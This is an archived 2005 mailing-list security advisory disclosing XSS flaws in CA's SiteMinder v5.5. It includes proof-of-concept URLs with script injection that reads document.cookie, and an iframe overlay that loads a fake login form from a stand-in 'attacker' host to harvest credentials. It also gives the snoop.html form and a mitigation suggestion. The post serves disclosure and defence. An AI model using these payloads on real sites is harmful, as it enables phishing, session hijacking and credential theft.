lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <df8ba96d050708070869551019@mail.gmail.com>
Date: Fri Jul  8 15:09:01 2005
From: c0ntexb at gmail.com (c0ntex)
Subject: SiteMinder Multiple Vulnerabilities

 /*
  *****************************************************************************************************************
  $ An open security advisory #10 - Siteminder v5.5 Vulnerabilities
  *****************************************************************************************************************
  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
  2: Bug Released: July 08 2005
  3: Bug Impact Rate: Medium / Hi
  4: Bug Scope Rate: Remote
  *****************************************************************************************************************
  $ This advisory and/or proof of concept code must not be used for
commercial gain.
  *****************************************************************************************************************

  Siteminder
  http://www3.ca.com/Solutions/Product.asp?ID=5262

  "eTrust? SiteMinder(r) is a market-leading, security and management
foundation for enterprise
  Web applications with a centralized security infrastructure for
managing user authentication and
  access. eTrust SiteMinder delivers the market's most advanced
security management capabilities
  and enterprise-class site administration, reducing overall IT
operational cost and complexity.
  eTrust SiteMinder enables the secure delivery of essential
information and applications to
  employees, partners, suppliers and customers, and scales with
growing business needs.."

  Siteminder is vulnerable to XSS whereby a user can tag HTML or
javascript on to various locations
  in a URL or input field and have the script run in the local users
browser. This can be used to
  perform phishing attacks, hijack users browser sessions or user
account information by redrawing
  the login page of a site.

  http://vuln/siteminderagent/pwcgi/smpwservicescgi.exe?SMAUTHREASON=0&TARGET=&
  USERNAME=hacker&PASSWORD="><script>alert(document.cookie)</script>&BUFFER=">
  <script>alert("Vulnerable")</script>

  The following link will abuse the URL option by first logging the
user out of the site with a
  timeout error, due to the fact that we send her off to another HTTPS
site, taking the user back
  to the login page. Next, we open an IFRAME over the original login
fields with malicious Username
  and Password input fields, whereby a user will then supply their
login details to a malicious site,
  to be later harvested and used in an attack.

  http://site.com/siteminderagent/forms/login.fcc?TYPE=1&REALMOID=01-000000000-000000-0010-
  0000-0000000000000&GUID=&SMAUTHREASON=32&TARGET=http://site.com/servlet/yum/eat/
  user.html"><iframe bgcolor="white" src="https://attacker/snoop.html"
style="position: absolute;
  top: 270px; left: 15 px;"></iframe><iframe
src="https://attacker/snoop.html" style="position:
  absolute; top: 270px; left: 15 px;"></iframe>

  To test if you are vulnerable to this issue, you can tag the
following on to the end of a
  siteminder URL. If it is successful, you should see the Google
homepage within an IFRAME.

  "><iframe bgcolor="white" src="http://www.google.com"
style="position: absolute; top: 270px;
  left: 15 px;"></iframe><iframe src="http://www.google.com"
style="position: absolute; top:
  270px; left: 15 px;"></iframe>


  /* snoop.html */
  <html>
    </head></head>
  <body>
    <form>
     User ID
      <input type="text" name="UserID">
     <br>
     Password:
      <input type="text" name="Password">
      <input type="submit" value="Submit">
    </form>
  </body>
  </html>


  I have contacted Netegrity via ca.com multiple times but received no
response, as such, users
  should use a filtering technology like modsecurity to detect the
above descibed attacks until
  a fix has been released.

Powered by blists - more mailing lists